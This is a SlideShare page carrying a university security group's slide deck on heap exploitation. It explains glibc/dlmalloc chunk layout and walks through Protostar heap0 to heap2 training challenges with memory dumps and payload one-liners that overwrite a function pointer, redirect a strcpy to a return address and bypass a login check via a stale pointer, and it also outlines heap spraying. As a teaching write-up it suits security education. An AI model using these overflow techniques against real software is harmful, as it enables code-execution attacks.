SlideShare una empresa de Scribd logo

Heap Base Exploitation

UTD Computer Security Group
UTD Computer Security Group

We introduce the fundamentals of dynamic memory allocation and highlight several exploitable properties. These ideas are put into practice in a set of heap overflow challenges from exploit-exercise.com's Protostar VM. We walk through the first three. Other uses of heap space such as heap spraying are mentioned.

Tecnología
1 de 47
Descargar para leer sin conexión
Scott Hand CSG 2/22/12 HEAP BASED EXPLOITATION
 Heap Basics  Overview of Exercise Environment Protostar  Heap0  Heap1  Heap2  Heap3  Heap Spraying  Conclusion WHAT WE WILL COVER…
Heap Background and Theory BASICS
 We know about the stack. Programs store local variables there.  Heaps are for storing globals as well as variables too large for the stack  In Linux:  .data – Initialized globals  .bss – Uninitialized globals  Heap – Dynamically allocated space, grows upwards  Stack – Local variables, grows down WHAT IS THE HEAP?
 glibc uses a version of the popular dlmalloc algorithm  Memory is allocated in chunks. Each chunk is 8-byte aligned with a header and data.  Each chunk contains:  Size information before and after the chunk – Easy to combine chunks and allows bidirection traversal from any chunk. Trailer fields are sometimes omitted in recent implementations  Chunks are stored in a linked list of bins, sorted by size in continuous increments of 8 for sizes under 512. Over 512 can be any multiple of 8.  Upon freeing a chunk, it is combined with freed neighbors to lower fragmentation  The final “top” chunk is empty and its size records the remaining about of free space MEMORY ALLOCATION DATA STRUCTURES
BINNING Size: 16 Size: 24 Size: 32 Size: 512 Size: 576 Size: 231… … Chunk 1 Chunk 2 Chunk 3 Chunk 4 Chunk 5
 Locality Preservation  Chunks allocated at the same time tend to be referenced similarly and have coexistent lifetimes  Important for good performance, reduces cache misses  A tweaked version of nearest-fit is used that results in consecutive blocks when there is space  This is good for us  Easy to create overflows, as memory allocated after vulnerable variables is often given to other variables nearby that may be for things such as function pointers or file paths SOME CONSEQUENCES
 We want to see what the heap looks like as more memory is allocated  We will allocate three strings: a, b, c. Each is 32 bytes.  Code: char *a, *b, *c; a = malloc(32); b = malloc(32); c = malloc(32);  This will serve as an introduction to the heap3 problem MALLOC EXAMPLE
FIRST ALLOCATION 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a Remaining Space: 0xFD9
SECOND ALLOCATION 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 32 Byte Data Chunk 2 b Remaining Space: 0xFB1
THIRD ALLOCATION 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 32 Byte Data Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 32 Byte Data Chunk 3 c Remaining Space: 0xF89
 Now, the interesting (and exploitable) part involves the free() implementation in dlmalloc  Let’s examine the contents of memory after successive free() commands are executed.  Code: free(c); free(b); free(a); FREE EXAMPLE
BEFORE FIRST FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “CCCC0” Chunk 3 c Remaining Space: 0xF89
AFTER FIRST FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
AFTER SECOND FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
AFTER THIRD FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “0x0804c028” Chunk 1 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
 Here’s the chunk structure with important parts bolded: struct malloc_chunk { INTERNAL_SIZE_T prev_size; INTERNAL_SIZE_T size; struct malloc_chunk* fd; struct malloc_chunk* bk; /* Only for large blocks: pointer to next larger size. */ struct malloc_chunk* fd_nextsize; struct malloc_chunk* bk_nextsize; }; LOOKING AT MALLOC.C…
 Looks like, for whatever reason, this machine uses singly linked lists rather than doubly linked lists  We only have the size and fd values to modify SOME OBSERVATIONS
 3 Virtual Machines with Challenges  Nebula – Basic exploitation for people with no experience  Protostar – Lots of real-world exploits without some of the modern exploit mitigation systems  Fusion – Advanced scenarios and modern protection systems. Good for those who want to learn how to bypass those systems.  We will use Protostar. It has 4 heap-based exploitation challenges EXPLOIT-EXERCISES.COM
 Heap0 – Basic heap overflow  Heap1 – More complicated overflow  Heap2 – Stale pointers  Heap3 – Heap metadata manipulation HEAP CHALLENGES
Basic OverflowHEAP0
 Goal – We want to change the function pointer that points to nowinner() to point to winner() instead  Description from author: This level introduces heap overflows and how they can influence code flow. HEAP0 - OVERVIEW
 Relevant Code: struct data *d; struct fp *f; d = malloc(sizeof(struct data)); f = malloc(sizeof(struct fp)); f->fp = nowinner; printf("data is at %p, fp is at %pn", d, f); strcpy(d->name, argv[1]); f->fp(); HEAP0 - CODE
0x804a000: 0x00000000 0x00000049 0x00000000 0x00000000 0x804a010: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a020: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a030: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a040: 0x00000000 0x00000000 0x00000000 0x00000011 0x804a050: 0x08048478 0x00000000 0x00000000 0x00020fa9 0x804a060: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a070: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a080: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a090: 0x00000000 0x00000000 0x00000000 0x00000000 HEAP0 – VALID INPUT BEFORE STRCPY d f nowinner()
0x804a000: 0x00000000 0x00000049 0x41414141 0x00000000 0x804a010: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a020: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a030: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a040: 0x00000000 0x00000000 0x00000000 0x00000011 0x804a050: 0x08048478 0x00000000 0x00000000 0x00020fa9 0x804a060: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a070: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a080: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a090: 0x00000000 0x00000000 0x00000000 0x00000000 HEAP0 – VALID INPUT AFTER STRCPY d f nowinner() “AAAA”
 If we overflow the character buffer in d, we can overwrite the function pointer f  The distance from f to d is 0x804a050-0x804a008 = 72  The pointer for winner() is 0x8048464  Python Code: print "A"*72 + "x64x84x04x08" HEAP0 – EXPLOIT CREATION
0x804a000: 0x00000000 0x00000049 0x41414141 0x41414141 0x804a010: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a020: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a030: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a040: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a050: 0x08048464 0x00000000 0x00000000 0x00020fa9 0x804a060: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a070: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a080: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a090: 0x00000000 0x00000000 0x00000000 0x00000000 HEAP0 – INVALID INPUT AFTER STRCPY d f winner()
Tougher OverflowHEAP1
 Goal – Execute the winner() function again. But it’s not so obvious how this will happen.  There are two allocations and two strcpy commands  There are no function pointers. What should we overwrite?  Description from Author: This level takes a look at code flow hijacking in data overwrite cases. HEAP1 - OVERVIEW
 Relevant Code struct internet *i1, *i2, *i3; i1 = malloc(sizeof(struct internet)); i1->priority = 1; i1->name = malloc(8); i2 = malloc(sizeof(struct internet)); i2->priority = 2; i2->name = malloc(8); strcpy(i1->name, argv[1]); strcpy(i2->name, argv[2]); HEAP1 –CODE
 This instruction is the important one: strcpy(i2->name, argv[2]);  We are moving an argument into a pointer stored at i2->name  Can we change the destination of our argument? HEAP1 – EXPLOIT IDEAS
0x804a000: 0x00000000 0x00000011 0x00000001 0x0804a018 0x804a010: 0x00000000 0x00000011 0x00000000 0x00000000 0x804a020: 0x00000000 0x00000011 0x00000002 0x0804a038 0x804a030: 0x00000000 0x00000011 0x00000000 0x00000000 0x804a040: 0x00000000 0x00020fc1 0x00000000 0x00000000 HEAP1 – VALID INPUT BEFORE STRCPY i1->name i1 i2 i2->name
0x804a000: 0x00000000 0x00000011 0x00000001 0x0804a018 0x804a010: 0x00000000 0x00000011 0x41414141 0x00000000 0x804a020: 0x00000000 0x00000011 0x00000002 0x0804a038 0x804a030: 0x00000000 0x00000011 0x42424242 0x00000000 0x804a040: 0x00000000 0x00020fc1 0x00000000 0x00000000 HEAP1 – VALID INPUT AFTER STRCPY i1->name = “AAAA”i1 i2 i2->name = “BBBB”
 Let’s overflow i1->name to overwrite i2->name’s pointer  Where to point?  Return address!  20 characters of padding “A” characters  Return address is stored at 0xbffff79c  Address of winner() is 0x08048494  Python Code for overflow (i1):  print "A"*20 + "x9cxf7xffxbf"  Shell Code for replacement (i2):  printf "x94x84x04x08"  Final exploit:  `python -c 'print "A"*20 + "x9cxf7xffxbf"'` `printf "x94x84x04x08"` HEAP1 – EXPLOIT CREATION
Stale PointersHEAP2
 Goal – According to the problem description, this level is completed when you see the "you have logged in already!" message  Description from Author: This level examines what can happen when heap pointers are stale. HEAP2 - OVERVIEW
 For each input loop, the following commands are parsed:  auth  Description: Allocates memory for auth pointer, clears it, then copies the user input into it  Code: auth = malloc(sizeof(auth)); memset(auth, 0, sizeof(auth)); if(strlen(line + 5) < 31) { strcpy(auth->name, line + 5); }  service  Description: Changes the service pointer to a duplicate of the provided input  Code: service = strdup(line + 7); HEAP2 – PROGRAM DESCRIPTION
 For each input loop, the following commands are parsed:  reset  Description: Frees the auth pointer  Code: free(auth);  login  Description: Simulates a login. If the auth->auth field is nonzero, then the user is logged in. Otherwise, we get a dummy password prompt.  Code: if(auth->auth) { printf("you have logged in already!n"); } else { printf("please enter your passwordn"); } HEAP2 – PROGRAM DESCRIPTION
 This program calls malloc() for auth using sizeof(auth)  sizeof(auth) returns 4 because it’s returning the size of the pointer, not the size of the struct  However, calls to auth->auth still access memory well beyond its allocated 4 bytes HEAP2 – VULNERABILITY
 Let’s call “auth CSG” to set up our auth pointer  Then call “service” with a bunch of non-zero garbage  Then, auth->auth will overflow auth’s buffer into service’s buffer and read a non-zero integer.  Python Exploit: print "auth CSGnservice " + "A"*16 + "nlogin" HEAP2 – EXPLOIT
HEAP2 – EXPLOIT VISUALIZED What the programmer thinks happened: auth size auth->name auth->auth 0x804c000 0x804c008 0x804c028 service size service data 0x804c030 0x804c038 What actually happened: 0x804c000 0x804c008 auth size 0x804c018 0x804c020 service size service data 0x804c028 auth->name auth->auth auth->auth is non-zero
Metadata CorruptionHEAP3
 Try this one on your own  We’ll go over the solution next week HEAP3 – OVERVIEW
More Heap AbuseHEAP SPRAYING
 The memory allocation algorithm’s tendency towards contiguous chunk placement can be used for evil yet again  In browser, PDF, Flash, etc. exploitation in which the user can control memory allocations (usually via scripting languages like JavaScript), payload placement is usually done on the heap  How do we reliably find our payload in the potentially fragmented heap?  Fill up an entire chunk with NOP sled + payload and spray it repeatedly into the heap  Once the allocator fills in the gaps for the heap fragmentation, we get a nice big contiguous landing area HEAP SPRAYING
CONCLUSION
 Links:  http://www.exploit-exercises.com  https://www.corelan.be/index.php/2011/12/31/exploit-writing- tutorial-part-11-heap-spraying-demystified/  Any questions? CONCLUSION

Recomendados

Regular Expressions in PHP
Regular Expressions in PHPRegular Expressions in PHP
Regular Expressions in PHPAndrew Kandels
 
PHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersPHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersMohammed Mushtaq Ahmed
 
Php Simple Xml
Php Simple XmlPhp Simple Xml
Php Simple Xmlmussawir20
 
Address Spaces Education
Address Spaces EducationAddress Spaces Education
Address Spaces EducationDaniel FitzGerald
 
Đề thi Kỹ thuật lập trình có lời giải
Đề thi Kỹ thuật lập trình có lời giảiĐề thi Kỹ thuật lập trình có lời giải
Đề thi Kỹ thuật lập trình có lời giảinataliej4
 
Python: The Iterator Pattern
Python: The Iterator PatternPython: The Iterator Pattern
Python: The Iterator PatternDamian T. Gordon
 
파이썬+네트워크 20160210
파이썬+네트워크 20160210파이썬+네트워크 20160210
파이썬+네트워크 20160210Yong Joon Moon
 
Draw and explain the architecture of general purpose microprocessor
Draw and explain the architecture of general purpose microprocessor Draw and explain the architecture of general purpose microprocessor
Draw and explain the architecture of general purpose microprocessor Pundra university Science and technology
 

Recomendados

Regular Expressions in PHP
Regular Expressions in PHPRegular Expressions in PHP
Regular Expressions in PHPAndrew Kandels
 
PHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersPHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersMohammed Mushtaq Ahmed
 
Php Simple Xml
Php Simple XmlPhp Simple Xml
Php Simple Xmlmussawir20
 
Address Spaces Education
Address Spaces EducationAddress Spaces Education
Address Spaces EducationDaniel FitzGerald
 
Đề thi Kỹ thuật lập trình có lời giải
Đề thi Kỹ thuật lập trình có lời giảiĐề thi Kỹ thuật lập trình có lời giải
Đề thi Kỹ thuật lập trình có lời giảinataliej4
 
Python: The Iterator Pattern
Python: The Iterator PatternPython: The Iterator Pattern
Python: The Iterator PatternDamian T. Gordon
 
파이썬+네트워크 20160210
파이썬+네트워크 20160210파이썬+네트워크 20160210
파이썬+네트워크 20160210Yong Joon Moon
 
Draw and explain the architecture of general purpose microprocessor
Draw and explain the architecture of general purpose microprocessor Draw and explain the architecture of general purpose microprocessor
Draw and explain the architecture of general purpose microprocessor Pundra university Science and technology
 
Information Retrieval
Information RetrievalInformation Retrieval
Information RetrievalPhuong Pham
 
Javascript arrays
Javascript arraysJavascript arrays
Javascript arraysHassan Dar
 
Lập trình chương trình chat room sử dụng giao thức tcp socket
Lập trình chương trình chat room sử dụng giao thức tcp socketLập trình chương trình chat room sử dụng giao thức tcp socket
Lập trình chương trình chat room sử dụng giao thức tcp socketjackjohn45
 
Chia subnetmask
Chia subnetmaskChia subnetmask
Chia subnetmaskptquang160492
 
HTML5 Web storage
HTML5 Web storageHTML5 Web storage
HTML5 Web storageMuhammad Ehtisham Siddiqui
 
Ssh
SshSsh
Sshphanleson
 
Python modules
Python modulesPython modules
Python modulesShanmugapriya Dineshbabu
 
Data and time
Data and timeData and time
Data and timekajal supernova
 
Python lambda functions with filter, map & reduce function
Python lambda functions with filter, map & reduce functionPython lambda functions with filter, map & reduce function
Python lambda functions with filter, map & reduce functionARVIND PANDE
 
jQuery
jQueryjQuery
jQueryVishwa Mohan
 
GIỚI THIỆU VỀ MÔ HÌNH ỨNG DỤNG MẠNG
GIỚI THIỆU VỀ MÔ HÌNH ỨNG DỤNG MẠNGGIỚI THIỆU VỀ MÔ HÌNH ỨNG DỤNG MẠNG
GIỚI THIỆU VỀ MÔ HÌNH ỨNG DỤNG MẠNGPMC WEB
 
Clock Synchronization (Distributed computing)
Clock Synchronization (Distributed computing)Clock Synchronization (Distributed computing)
Clock Synchronization (Distributed computing)Sri Prasanna
 
Ket tap, ke thua
Ket tap, ke thuaKet tap, ke thua
Ket tap, ke thuaTuan Do
 
DHTML - Events & Buttons
DHTML - Events & ButtonsDHTML - Events & Buttons
DHTML - Events & ButtonsDeep Patel
 
Javascript validating form
Javascript validating formJavascript validating form
Javascript validating formJesus Obenita Jr.
 
Lab 5. GPO.pdf
Lab 5. GPO.pdfLab 5. GPO.pdf
Lab 5. GPO.pdf7311NguynDuyNin
 
Ajax ppt
Ajax pptAjax ppt
Ajax pptOECLIB Odisha Electronics Control Library
 
Python sqlite3
Python sqlite3Python sqlite3
Python sqlite3Alexey Bovanenko
 
PHP Cookies and Sessions
PHP Cookies and SessionsPHP Cookies and Sessions
PHP Cookies and SessionsNisa Soomro
 
Bài giảng mật mã học cơ sở PTIT
Bài giảng mật mã học cơ sở PTITBài giảng mật mã học cơ sở PTIT
Bài giảng mật mã học cơ sở PTITNguynMinh294
 
Protostar VM - Heap3
Protostar VM - Heap3Protostar VM - Heap3
Protostar VM - Heap3UTD Computer Security Group
 
Heaps About Heaps - Brett Moore.ppt
Heaps About Heaps - Brett Moore.pptHeaps About Heaps - Brett Moore.ppt
Heaps About Heaps - Brett Moore.pptdamesmith
 

Más contenido relacionado

La actualidad más candente

Information Retrieval
Information RetrievalInformation Retrieval
Information RetrievalPhuong Pham
 
Javascript arrays
Javascript arraysJavascript arrays
Javascript arraysHassan Dar
 
Lập trình chương trình chat room sử dụng giao thức tcp socket
Lập trình chương trình chat room sử dụng giao thức tcp socketLập trình chương trình chat room sử dụng giao thức tcp socket
Lập trình chương trình chat room sử dụng giao thức tcp socketjackjohn45
 
Python lambda functions with filter, map & reduce function
Python lambda functions with filter, map & reduce functionPython lambda functions with filter, map & reduce function
Python lambda functions with filter, map & reduce functionARVIND PANDE
 
GIỚI THIỆU VỀ MÔ HÌNH ỨNG DỤNG MẠNG
GIỚI THIỆU VỀ MÔ HÌNH ỨNG DỤNG MẠNGGIỚI THIỆU VỀ MÔ HÌNH ỨNG DỤNG MẠNG
GIỚI THIỆU VỀ MÔ HÌNH ỨNG DỤNG MẠNGPMC WEB
 
Clock Synchronization (Distributed computing)
Clock Synchronization (Distributed computing)Clock Synchronization (Distributed computing)
Clock Synchronization (Distributed computing)Sri Prasanna
 
Ket tap, ke thua
Ket tap, ke thuaKet tap, ke thua
Ket tap, ke thuaTuan Do
 
DHTML - Events & Buttons
DHTML - Events & ButtonsDHTML - Events & Buttons
DHTML - Events & ButtonsDeep Patel
 
PHP Cookies and Sessions
PHP Cookies and SessionsPHP Cookies and Sessions
PHP Cookies and SessionsNisa Soomro
 
Bài giảng mật mã học cơ sở PTIT
Bài giảng mật mã học cơ sở PTITBài giảng mật mã học cơ sở PTIT
Bài giảng mật mã học cơ sở PTITNguynMinh294
 

La actualidad más candente (20)

Information Retrieval
Information RetrievalInformation Retrieval
Information Retrieval
 
Javascript arrays
Javascript arraysJavascript arrays
Javascript arrays
 
Lập trình chương trình chat room sử dụng giao thức tcp socket
Lập trình chương trình chat room sử dụng giao thức tcp socketLập trình chương trình chat room sử dụng giao thức tcp socket
Lập trình chương trình chat room sử dụng giao thức tcp socket
 
Chia subnetmask
Chia subnetmaskChia subnetmask
Chia subnetmask
 
HTML5 Web storage
HTML5 Web storageHTML5 Web storage
HTML5 Web storage
 
Ssh
SshSsh
Ssh
 
Python modules
Python modulesPython modules
Python modules
 
Data and time
Data and timeData and time
Data and time
 
Python lambda functions with filter, map & reduce function
Python lambda functions with filter, map & reduce functionPython lambda functions with filter, map & reduce function
Python lambda functions with filter, map & reduce function
 
jQuery
jQueryjQuery
jQuery
 
GIỚI THIỆU VỀ MÔ HÌNH ỨNG DỤNG MẠNG
GIỚI THIỆU VỀ MÔ HÌNH ỨNG DỤNG MẠNGGIỚI THIỆU VỀ MÔ HÌNH ỨNG DỤNG MẠNG
GIỚI THIỆU VỀ MÔ HÌNH ỨNG DỤNG MẠNG
 
Clock Synchronization (Distributed computing)
Clock Synchronization (Distributed computing)Clock Synchronization (Distributed computing)
Clock Synchronization (Distributed computing)
 
Ket tap, ke thua
Ket tap, ke thuaKet tap, ke thua
Ket tap, ke thua
 
DHTML - Events & Buttons
DHTML - Events & ButtonsDHTML - Events & Buttons
DHTML - Events & Buttons
 
Javascript validating form
Javascript validating formJavascript validating form
Javascript validating form
 
Lab 5. GPO.pdf
Lab 5. GPO.pdfLab 5. GPO.pdf
Lab 5. GPO.pdf
 
Ajax ppt
Ajax pptAjax ppt
Ajax ppt
 
Python sqlite3
Python sqlite3Python sqlite3
Python sqlite3
 
PHP Cookies and Sessions
PHP Cookies and SessionsPHP Cookies and Sessions
PHP Cookies and Sessions
 
Bài giảng mật mã học cơ sở PTIT
Bài giảng mật mã học cơ sở PTITBài giảng mật mã học cơ sở PTIT
Bài giảng mật mã học cơ sở PTIT
 

Similar a Heap Base Exploitation

Heaps About Heaps - Brett Moore.ppt
Heaps About Heaps - Brett Moore.pptHeaps About Heaps - Brett Moore.ppt
Heaps About Heaps - Brett Moore.pptdamesmith
 
HBase at Xiaomi
HBase at XiaomiHBase at Xiaomi
HBase at XiaomiHBaseCon
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbgArno Huetter
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflowsjohseg
 
EMBEDDED SYSTEMS 4&5
EMBEDDED SYSTEMS 4&5EMBEDDED SYSTEMS 4&5
EMBEDDED SYSTEMS 4&5PRADEEP
 
APEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQLAPEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQLConnor McDonald
 
Berkeley Packet Filters
Berkeley Packet FiltersBerkeley Packet Filters
Berkeley Packet FiltersKernel TLV
 
Microprocessor & Assembly language by team blackhole
Microprocessor & Assembly language by team blackholeMicroprocessor & Assembly language by team blackhole
Microprocessor & Assembly language by team blackholeMd Abdus Sobur Sikdar
 
Direct SGA access without SQL
Direct SGA access without SQLDirect SGA access without SQL
Direct SGA access without SQLKyle Hailey
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stackAlexandre Moneger
 
Microcontroladores: tutorial de microcontrolador 8051
Microcontroladores: tutorial de microcontrolador 8051Microcontroladores: tutorial de microcontrolador 8051
Microcontroladores: tutorial de microcontrolador 8051SANTIAGO PABLO ALBERTO
 
Fundamentals of Complete Crash and Hang Memory Dump Analysis
Fundamentals of Complete Crash and Hang Memory Dump AnalysisFundamentals of Complete Crash and Hang Memory Dump Analysis
Fundamentals of Complete Crash and Hang Memory Dump AnalysisDmitry Vostokov
 

Similar a Heap Base Exploitation (20)

Protostar VM - Heap3
Protostar VM - Heap3Protostar VM - Heap3
Protostar VM - Heap3
 
Heaps About Heaps - Brett Moore.ppt
Heaps About Heaps - Brett Moore.pptHeaps About Heaps - Brett Moore.ppt
Heaps About Heaps - Brett Moore.ppt
 
Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash Course
 
Microprocessor lecture 2
Microprocessor lecture 2Microprocessor lecture 2
Microprocessor lecture 2
 
HBase at Xiaomi
HBase at XiaomiHBase at Xiaomi
HBase at Xiaomi
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbg
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflows
 
EMBEDDED SYSTEMS 4&5
EMBEDDED SYSTEMS 4&5EMBEDDED SYSTEMS 4&5
EMBEDDED SYSTEMS 4&5
 
APEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQLAPEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQL
 
8051
80518051
8051
 
8086
80868086
8086
 
Berkeley Packet Filters
Berkeley Packet FiltersBerkeley Packet Filters
Berkeley Packet Filters
 
Microprocessor & Assembly language by team blackhole
Microprocessor & Assembly language by team blackholeMicroprocessor & Assembly language by team blackhole
Microprocessor & Assembly language by team blackhole
 
Direct SGA access without SQL
Direct SGA access without SQLDirect SGA access without SQL
Direct SGA access without SQL
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
Microcontroladores: tutorial de microcontrolador 8051
Microcontroladores: tutorial de microcontrolador 8051Microcontroladores: tutorial de microcontrolador 8051
Microcontroladores: tutorial de microcontrolador 8051
 
Fundamentals of Complete Crash and Hang Memory Dump Analysis
Fundamentals of Complete Crash and Hang Memory Dump AnalysisFundamentals of Complete Crash and Hang Memory Dump Analysis
Fundamentals of Complete Crash and Hang Memory Dump Analysis
 
mpmc cse ppt.pdf
mpmc cse ppt.pdfmpmc cse ppt.pdf
mpmc cse ppt.pdf
 

Más de UTD Computer Security Group

UTD Computer Security Group - Cracking the domain
UTD Computer Security Group - Cracking the domainUTD Computer Security Group - Cracking the domain
UTD Computer Security Group - Cracking the domainUTD Computer Security Group
 

Más de UTD Computer Security Group (20)

Py jail talk
Py jail talkPy jail talk
Py jail talk
 
22S kickoff 2.0 (kickoff + anonymity talk)
22S kickoff 2.0 (kickoff + anonymity talk)22S kickoff 2.0 (kickoff + anonymity talk)
22S kickoff 2.0 (kickoff + anonymity talk)
 
Cloud talk
Cloud talkCloud talk
Cloud talk
 
UTD Computer Security Group - Cracking the domain
UTD Computer Security Group - Cracking the domainUTD Computer Security Group - Cracking the domain
UTD Computer Security Group - Cracking the domain
 
Forensics audio and video
Forensics audio and videoForensics audio and video
Forensics audio and video
 
Computer networks and network security
Computer networks and network securityComputer networks and network security
Computer networks and network security
 
Intro to python
Intro to pythonIntro to python
Intro to python
 
Powershell crash course
Powershell crash coursePowershell crash course
Powershell crash course
 
Intro to cybersecurity
Intro to cybersecurityIntro to cybersecurity
Intro to cybersecurity
 
Intro to Bash
Intro to BashIntro to Bash
Intro to Bash
 
Web Exploitation
Web ExploitationWeb Exploitation
Web Exploitation
 
Network Exploitation
Network ExploitationNetwork Exploitation
Network Exploitation
 
Penetration Testing: Celestial
Penetration Testing: CelestialPenetration Testing: Celestial
Penetration Testing: Celestial
 
Introduction to Exploitation
Introduction to ExploitationIntroduction to Exploitation
Introduction to Exploitation
 
Cryptography Crash Course
Cryptography Crash CourseCryptography Crash Course
Cryptography Crash Course
 
Fuzzing - Part 2
Fuzzing - Part 2Fuzzing - Part 2
Fuzzing - Part 2
 
Fuzzing - Part 1
Fuzzing - Part 1Fuzzing - Part 1
Fuzzing - Part 1
 
Return Oriented Programming
Return Oriented ProgrammingReturn Oriented Programming
Return Oriented Programming
 
Advanced Windows Exploitation
Advanced Windows ExploitationAdvanced Windows Exploitation
Advanced Windows Exploitation
 
Advanced Domain Hacking
Advanced Domain HackingAdvanced Domain Hacking
Advanced Domain Hacking
 

Último

Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
